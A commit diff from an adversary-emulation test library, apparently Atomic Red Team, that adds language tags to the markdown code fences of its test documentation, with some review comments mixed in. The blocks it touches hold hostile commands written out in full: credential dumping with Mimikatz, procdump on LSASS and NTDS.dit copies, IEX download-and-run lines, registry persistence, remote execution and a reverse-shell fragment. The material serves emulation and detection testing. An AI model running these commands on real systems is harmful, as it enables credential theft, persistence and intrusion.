Specify language for markdown code blocks (#882)

* specify code block type in markdown

* specify code block type in markdown
Carrie Roberts
2020-03-16 08:46:25 -06:00
committed by GitHub
parent 71f3fbbaeb
commit 6ec7d4bcf0
155 changed files with 2784 additions and 1720 deletions
+16 -5
@@ -41,28 +41,39 @@ end.join(', ') %>
#### Attack Commands: Run with `<%= test['executor']['name'] %>`! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>
```
<%def get_language(executor)
language = executor
if executor == "command_prompt"
language = "cmd"
elsif executor == "manual"
language = ""
end
language
end%>
```<%= get_language(test['executor']['name']) %>
<%= test['executor']['command'].to_s.strip %>
```
<%- end -%>
<%- if test['executor']['cleanup_command'] != nil -%>
#### Cleanup Commands:
```
```<%= get_language(test['executor']['name']) %>
<%= test['executor']['cleanup_command'].to_s.strip %>
```
<%- end -%>
<% if test['dependencies'].to_a.count > 0 %>
#### Dependencies: Run with `<%- if test['dependency_executor_name'] != nil%><%= test['dependency_executor_name'] %><%- else -%><%= test['executor']['name'] %><%- end -%>`!
<% dependency_executor = test['executor']['name'] %>
#### Dependencies: Run with `<%- if test['dependency_executor_name'] != nil%><% dependency_executor = test['dependency_executor_name'] %><%= test['dependency_executor_name'] %><%- else -%><%= test['executor']['name'] %><%- end -%>`!
<% test['dependencies'].each do | dep | -%>
##### Description: <%= dep['description'].strip! %>
##### Check Prereq Commands:
```
```<%= get_language(dependency_executor) %>
<%= dep['prereq_command'].strip! %>
```
##### Get Prereq Commands:
```
```<%= get_language(dependency_executor) %>
<%= dep['get_prereq_command'].strip! %>
```
<% end -%>
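Review bot: the `dependency_executor` reassignment in the new `#### Dependencies` heading line is buried between the `<%- if ... %>` and the `<%= %>` output, which makes the heading hard to read and easy to break on the next edit; compute it once on the preceding line, e.g. `<% dependency_executor = test['dependency_executor_name'] || test['executor']['name'] %>`, and let the heading just print `<%= dependency_executor %>`. Likewise `get_language` is defined with `<%def ... end%>` inside the template body, so Ruby redefines the method every time the template is evaluated (and warns about it under `-w`); it belongs in the generator script. Unrelated to this change but visible in the context lines: `strip!` returns nil when there is nothing to strip, so `<%= dep['prereq_command'].strip! %>` renders an empty code block for commands that are already clean; `strip` is the safe form.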
+29 -16
@@ -31,12 +31,14 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
#### Attack Commands: Run with `powershell`!
```
```powershell
dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
```
#### Cleanup Commands:
```
```powershell
Remove-Item -path #{output_file} -ErrorAction Ignore
```
@@ -64,24 +66,27 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
#### Attack Commands: Run with `command_prompt`!
```
```cmd
"#{rar_exe}" a -r #{output_file} #{input_path} *#{file_extension}
```
#### Cleanup Commands:
```
```cmd
del /f /q /s #{output_file} >nul 2>&1
```
#### Dependencies: Run with `command_prompt`!
##### Description: Rar tool must be installed at specified location (#{rar_exe})
##### Check Prereq Commands:
```
```cmd
if not exist "#{rar_exe}" (exit /b 1)
```
##### Get Prereq Commands:
```
```cmd
echo Downloading Winrar installer
bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer}
echo Follow the installer prompts to install Winrar
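Review bot: the Get Prereq block fetches the WinRAR installer with `bitsadmin /transfer` and runs it with no integrity check, whereas the T1003 prerequisites in this same commit verify downloads with `Invoke-WebRequestVerifyHash`; pinning an expected hash here would make the prerequisite consistent with the rest of the repository and protect the test host from a swapped installer.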
@@ -108,24 +113,27 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
#### Attack Commands: Run with `sh`!
```
```sh
zip #{output_file} #{input_files}
```
#### Cleanup Commands:
```
```sh
rm -f #{output_file}
```
#### Dependencies: Run with `sh`!
##### Description: Files to zip must exist (#{input_files})
##### Check Prereq Commands:
```
```sh
ls #{input_files}
```
##### Get Prereq Commands:
```
```sh
echo Please set input_files argument to include files that exist
```
@@ -149,12 +157,14 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
#### Attack Commands: Run with `sh`!
```
```sh
test -e #{input_file} && gzip -k #{input_file} || (echo '#{input_content}' >> #{input_file}; gzip -k #{input_file})
```
#### Cleanup Commands:
```
```sh
rm -f #{input_file}.gz
```
@@ -179,24 +189,27 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
#### Attack Commands: Run with `sh`!
```
```sh
tar -cvzf #{output_file} #{input_file_folder}
```
#### Cleanup Commands:
```
```sh
rm -f #{output_file}
```
#### Dependencies: Run with `sh`!
##### Description: Folder to zip must exist (#{input_file_folder})
##### Check Prereq Commands:
```
```sh
test -e #{input_file_folder}
```
##### Get Prereq Commands:
```
```sh
echo Please set input_file_folder argument to a folder that exists
```
+91 -54
@@ -179,7 +179,9 @@ Dumps credentials from memory via Powershell by invoking a remote mimikatz scrip
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
```
@@ -206,20 +208,23 @@ Dump credentials from memory using Gsecdump
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
#{gsecdump_exe} -a
```
#### Dependencies: Run with `powershell`!
##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
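Review bot: the Get Prereq block loads the hash verifier itself with `IEX(IWR "https://raw.githubusercontent.com/.../master/Public/Invoke-WebRequestVerifyHash.ps1")`, i.e. it downloads and executes whatever is on the master branch at run time, so the hash check it then performs on the gsecdump binary is only as trustworthy as that unpinned script; pin the URL to a specific commit (or ship the helper with the module) so the verifier cannot change underneath the test. The same pattern appears in the WCE prerequisites in the next hunk.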
@@ -249,20 +254,23 @@ Dump credentials from memory using Windows Credential Editor from https://www.am
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
#{wce_exe} -o #{output_file}
```
#### Dependencies: Run with `powershell`!
##### Description: Windows Credential Editor must exist on disk at specified location (#{wce_exe})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
$parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
@@ -287,14 +295,16 @@ via three registry keys. Then processed locally using https://github.com/Neohaps
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
```
#### Cleanup Commands:
```
```cmd
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
@@ -322,24 +332,27 @@ ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysin
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
#{procdump_exe} -accepteula -ma lsass.exe #{output_file}
```
#### Cleanup Commands:
```
```cmd
del "#{output_file}" >nul 2> nul
```
#### Dependencies: Run with `powershell`!
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
@@ -395,20 +408,23 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
```
#### Dependencies: Run with `powershell`!
##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200308/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
@@ -416,11 +432,11 @@ Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
```
##### Description: Lsass dump must exist at specified location (#{input_file})
##### Check Prereq Commands:
```
```powershell
cmd /c "if not exist #{input_file} (exit /b 1)"
```
##### Get Prereq Commands:
```
```powershell
Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"
```
@@ -445,20 +461,23 @@ subsequent domain controllers without the need of network-based replication.
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
@@ -481,20 +500,23 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
vssadmin.exe create shadow /for=#{drive_letter}
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
@@ -522,46 +544,49 @@ This test must be executed on a Windows Domain Controller.
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
```
#### Cleanup Commands:
```
```cmd
del "#{extract_path}\ntds.dit" >nul 2> nul
del "#{extract_path}\VSC_SYSTEM_HIVE" >nul 2> nul
del "#{extract_path}\SYSTEM_HIVE" >nul 2> nul
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
##### Description: Volume shadow copy must exist
##### Check Prereq Commands:
```
```cmd
if not exist #{vsc_name} (exit /b 1)
```
##### Get Prereq Commands:
```
```cmd
echo Run "Invoke-AtomicTest T1003 -TestName 'Create Volume Shadow Copy with NTDS.dit'" to fulfuill this requirement
```
##### Description: Extract path must exist
##### Check Prereq Commands:
```
```cmd
if not exist #{extract_path} (exit /b 1)
```
##### Get Prereq Commands:
```
```cmd
mkdir #{extract_path}
```
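Review bot: the Get Prereq message for the shadow-copy dependency reads `to fulfuill this requirement`; it should be `fulfill`. Trivial, but the line is user-facing output and this commit already touches the surrounding fence lines.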
@@ -579,20 +604,23 @@ Look for the encrypted cpassword value within Group Policy Preference files on t
#### Attack Commands: Run with `command_prompt`!
```
```cmd
findstr /S cpassword %logonserver%\sysvol\*.xml
```
#### Dependencies: Run with `powershell`!
##### Description: Computer must be domain joined
##### Check Prereq Commands:
```
```powershell
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
Write-Host Joining this computer to a domain must be done manually
```
@@ -616,31 +644,34 @@ Look for the encrypted cpassword value within Group Policy Preference files on t
#### Attack Commands: Run with `powershell`!
```
```powershell
. #{gpp_script_path}
Get-GPPPassword -Verbose
```
#### Dependencies: Run with `powershell`!
##### Description: Get-GPPPassword PowerShell Script must exist at #{gpp_script_path}
##### Check Prereq Commands:
```
```powershell
if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 }
```
##### Get Prereq Commands:
```
```powershell
New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null
Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}"
```
##### Description: Computer must be domain joined
##### Check Prereq Commands:
```
```powershell
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
Write-Host Joining this computer to a domain must be done manually
```
@@ -659,38 +690,41 @@ Parses secrets hidden in the LSASS process with python. Similar to mimikatz's se
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
pypykatz live lsa
```
#### Dependencies: Run with `powershell`!
##### Description: Computer must have python 3 installed
##### Check Prereq Commands:
```
```powershell
if (python --version) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
echo "Python 3 must be installed manually"
```
##### Description: Computer must have pip installed
##### Check Prereq Commands:
```
```powershell
if (pip3 -V) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
echo "PIP must be installed manually"
```
##### Description: pypykatz must be installed and part of PATH
##### Check Prereq Commands:
```
```powershell
if (cmd /c pypykatz -h) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
pip3 install pypykatz
```
@@ -708,38 +742,41 @@ Parses registry hives to obtain stored credentials
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
pypykatz live registry
```
#### Dependencies: Run with `powershell`!
##### Description: Computer must have python 3 installed
##### Check Prereq Commands:
```
```powershell
if (python --version) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
echo "Python 3 must be installed manually"
```
##### Description: Computer must have pip installed
##### Check Prereq Commands:
```
```powershell
if (pip3 -V) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
echo "PIP must be installed manually"
```
##### Description: pypykatz must be installed and part of PATH
##### Check Prereq Commands:
```
```powershell
if (cmd /c pypykatz -h) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
pip3 install pypykatz
```
+12 -6
@@ -34,12 +34,14 @@ PowerShell code to set Winlogon shell key to execute a binary at logon along wit
#### Attack Commands: Run with `powershell`!
```
```powershell
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
```
#### Cleanup Commands:
```
```powershell
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
```
@@ -63,12 +65,14 @@ PowerShell code to set Winlogon userinit key to execute a binary at logon along
#### Attack Commands: Run with `powershell`!
```
```powershell
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
```
#### Cleanup Commands:
```
```powershell
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
```
@@ -92,13 +96,15 @@ PowerShell code to set Winlogon Notify key to execute a notification package DLL
#### Attack Commands: Run with `powershell`!
```
```powershell
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
```
#### Cleanup Commands:
```
```powershell
Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore
```
+3 -1
@@ -25,7 +25,9 @@ This test uses `grep` to search a macOS Safari binaryCookies file for specified
#### Attack Commands: Run with `sh`!
```
```sh
cd ~/Library/Cookies
grep -q "#{search_string}" "Cookies.binarycookies"
```
+7 -3
@@ -19,7 +19,9 @@ Identify system services
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
tasklist.exe
sc query
sc query state= all
@@ -46,12 +48,14 @@ Enumerates started system services using net.exe and writes them to a file. This
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net.exe start >> #{output_file}
```
#### Cleanup Commands:
```
```cmd
del /f /q /s #{output_file} >nul 2>&1
```
+3 -1
@@ -25,7 +25,9 @@ Uses dd to add a zero to the binary to change the hash
#### Attack Commands: Run with `sh`!
```
```sh
dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
```
+7 -4
@@ -25,25 +25,28 @@ Compiles and executes C# code to list main window titles associated with each pr
#### Attack Commands: Run with `command_prompt`!
```
```cmd
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
#{output_file_name}
```
#### Cleanup Commands:
```
```cmd
del /f /q /s #{output_file_name} >nul 2>&1
```
#### Dependencies: Run with `powershell`!
##### Description: T1010.cs must exist on disk at specified location (#{input_source_code})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{input_source_code}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null
Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}"
```
+3 -1
@@ -30,7 +30,9 @@ https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
+9 -3
@@ -28,7 +28,9 @@ Loadable Kernel Module based Rootkit
#### Attack Commands: Run with `sh`!
```
```sh
sudo insmod #{rootkit_file}
```
@@ -53,7 +55,9 @@ Loadable Kernel Module based Rootkit
#### Attack Commands: Run with `sh`!
```
```sh
sudo modprobe #{rootkit_file}
```
@@ -85,7 +89,9 @@ It would be wise if you only run this in a test environment
#### Attack Commands: Run with `command_prompt`!
```
```cmd
puppetstrings #{driver_path}
```
+4 -2
@@ -39,7 +39,9 @@ Attaches cmd.exe to a list of processes. Configure your own Input arguments to a
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
$input_table = "#{parent_list}".split(",")
$Name = "Debugger"
$Value = "#{attached_process}"
@@ -59,7 +61,7 @@ Foreach ($item in $input_table){
```
#### Cleanup Commands:
```
```powershell
$input_table = "#{parent_list}".split(",")
Foreach ($item in $input_table)
{
+19 -8
@@ -27,7 +27,9 @@ Identify network configuration information
#### Attack Commands: Run with `command_prompt`!
```
```cmd
ipconfig /all
netsh interface show
arp -a
@@ -51,7 +53,9 @@ Enumerates Windows Firewall Rules using netsh.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
netsh advfirewall firewall show rule name=all
```
@@ -71,7 +75,9 @@ Identify network configuration information
#### Attack Commands: Run with `sh`!
```
```sh
arp -a
netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c
ifconfig
@@ -93,7 +99,9 @@ Identify network configuration information as seen by Trickbot and described her
#### Attack Commands: Run with `command_prompt`!
```
```cmd
ipconfig /all
net config workstation
net view /all /domain
@@ -124,7 +132,9 @@ https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-wi
#### Attack Commands: Run with `powershell`!
```
```powershell
$ports = Get-content #{port_file}
$file = "#{output_file}"
$totalopen = 0
@@ -154,19 +164,20 @@ Write-Host $results
```
#### Cleanup Commands:
```
```powershell
Remove-Item -ErrorAction ignore "#{output_file}"
```
#### Dependencies: Run with `powershell`!
##### Description: Test requires #{port_file} to exist
##### Check Prereq Commands:
```
```powershell
if (Test-Path "#{port_file}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}"
```
+24 -8
@@ -48,7 +48,9 @@ Identify remote systems with net.exe
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net view /domain
net view
```
@@ -69,7 +71,9 @@ Identify remote systems with net.exe querying the Active Directory Domain Comput
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net group "Domain Computers" /domain
```
@@ -94,7 +98,9 @@ Identify domain controllers for specified domain.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
nltest.exe /dclist:#{target_domain}
```
@@ -114,7 +120,9 @@ Identify remote systems via ping sweep
#### Attack Commands: Run with `command_prompt`!
```
```cmd
for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
```
@@ -134,7 +142,9 @@ Identify remote systems via arp
#### Attack Commands: Run with `command_prompt`!
```
```cmd
arp -a
```
@@ -154,7 +164,9 @@ Identify remote systems via arp
#### Attack Commands: Run with `sh`!
```
```sh
arp -a | grep -v '^?'
```
@@ -174,7 +186,9 @@ Identify remote systems via ping sweep
#### Attack Commands: Run with `sh`!
```
```sh
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
```
@@ -194,7 +208,9 @@ Powershell script that runs nslookup on cmd.exe against the local /24 network of
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
$pieces = $localip.split(".")
$firstOctet = $pieces[0]
+16 -7
@@ -25,7 +25,9 @@ Encrypt data for exiltration
#### Attack Commands: Run with `sh`!
```
```sh
mkdir /tmp/victim-files
cd /tmp/victim-files
touch a b c d e f g
@@ -38,7 +40,7 @@ ls -l
```
#### Cleanup Commands:
```
```sh
rm -Rf /tmp/victim-files
```
@@ -58,7 +60,9 @@ rar a -p"blue" hello.rar (VARIANT)
#### Attack Commands: Run with `command_prompt`!
```
```cmd
mkdir .\tmp\victim-files
cd .\tmp\victim-files
echo "This file will be encrypted" > .\encrypted_file.txt
@@ -90,7 +94,9 @@ wzzip sample.zip -s"blueblue" *.txt (VARIANT)
#### Attack Commands: Run with `command_prompt`!
```
```cmd
path=%path%;"C:\Program Files (x86)\winzip"
mkdir .\tmp\victim-files
cd .\tmp\victim-files
@@ -101,14 +107,15 @@ dir
#### Dependencies: Run with `powershell`!
##### Description: Winzip must be installed
##### Check Prereq Commands:
```
```powershell
cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)'
```
##### Get Prereq Commands:
```
```powershell
if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){
Write-Host Follow the installation prompts to continue
cmd /c "$env:Temp\winzip.exe"
@@ -129,7 +136,9 @@ Note: Requires 7zip installation
#### Attack Commands: Run with `command_prompt`!
```
```cmd
mkdir $PathToAtomicsFolder\T1022\victim-files
cd $PathToAtomicsFolder\T1022\victim-files
echo "This file will be encrypted" > .\encrypted_file.txt
+7 -3
@@ -25,7 +25,9 @@ gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-Strin
#### Attack Commands: Run with `command_prompt`!
```
```cmd
echo [InternetShortcut] > test.url && echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} && #{shortcut_file_path} >nul 2>&1
```
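Review bot: the first command writes the `[InternetShortcut]` header to a hard-coded `test.url`, while the second `echo` appends the `URL=` line to `#{shortcut_file_path}`; the shortcut that is actually launched therefore lacks its section header, and a stray `test.url` is left in the working directory with no cleanup. Both redirections should target `#{shortcut_file_path}`.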
@@ -45,7 +47,9 @@ LNK file to launch CMD placed in startup folder
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk")
$ShortCut.TargetPath="cmd.exe"
@@ -64,7 +68,7 @@ $ShortCut.Save()
```
#### Cleanup Commands:
```
```powershell
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk" -ErrorAction Ignore
Remove-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk" -ErrorAction Ignore
```
+10 -4
@@ -29,7 +29,9 @@ Creates a base64-encoded data file and decodes it into an executable shell scrip
#### Attack Commands: Run with `sh`!
```
```sh
sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
chmod +x /tmp/art.sh
@@ -57,7 +59,9 @@ Creates base64-encoded PowerShell code and executes it. This is used by numerous
#### Attack Commands: Run with `powershell`!
```
```powershell
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
@@ -89,7 +93,9 @@ Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates i
#### Attack Commands: Run with `powershell`!
```
```powershell
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
@@ -100,7 +106,7 @@ powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::From
```
#### Cleanup Commands:
```
```powershell
Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage}
```
+15 -5
@@ -25,7 +25,9 @@ Powershell Enable WinRM
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
Enable-PSRemoting -Force
```
@@ -54,7 +56,9 @@ https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-applicatio
#### Attack Commands: Run with `command_prompt`!
```
```cmd
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
```
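Review bot: `Documnet.ActiveView` in the MMC20.Application one-liner is a typo for `Document`; as written the property lookup on the COM object yields nothing and the `ExecuteShellCommand` call errors out, so the test never exercises the technique it documents. Pre-existing, but worth fixing while this block is being touched.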
@@ -81,7 +85,9 @@ Utilize WMIC to start remote process
#### Attack Commands: Run with `command_prompt`!
```
```cmd
wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
```
@@ -108,7 +114,9 @@ Utilize psexec to start remote process
#### Attack Commands: Run with `command_prompt`!
```
```cmd
psexec \\#{computer_name} -u #{user_name} -p #{password} -s cmd.exe
```
@@ -134,7 +142,9 @@ Execute Invoke-command on remote host
#### Attack Commands: Run with `powershell`!
```
```powershell
invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
```
+3 -1
@@ -17,7 +17,9 @@ Take a file/directory, split it into 5Mb chunks
#### Attack Commands: Run with `sh`!
```
```sh
cd /tmp/
dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1
split -b 5000000 /tmp/victim-whole-file
+4 -2
@@ -22,13 +22,15 @@ and will then revert the binPath change, restoring Fax to its original state.
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\""
sc start Fax
```
#### Cleanup Commands:
```
```cmd
sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe"
```
+3 -1
@@ -26,7 +26,9 @@ https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-
#### Attack Commands: Run with `powershell`!
```
```powershell
$server_ip = #{server_ip}
$server_port = #{server_port}
$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', #{server_port})
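Review bot: `$server_ip = #{server_ip}` and `$server_port = #{server_port}` substitute the arguments unquoted, so a value such as an IPv4 address or a hostname is not a valid PowerShell literal and the script fails to parse before the TcpClient line runs; quote the address (`'#{server_ip}'`). Since the `New-Object Net.Sockets.TcpClient` line already uses the raw placeholders, either reference the two variables there or drop them.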
+6 -2
@@ -34,7 +34,9 @@ Identify System owner or users on an endpoint
#### Attack Commands: Run with `command_prompt`!
```
```cmd
cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"#{computer_name}"
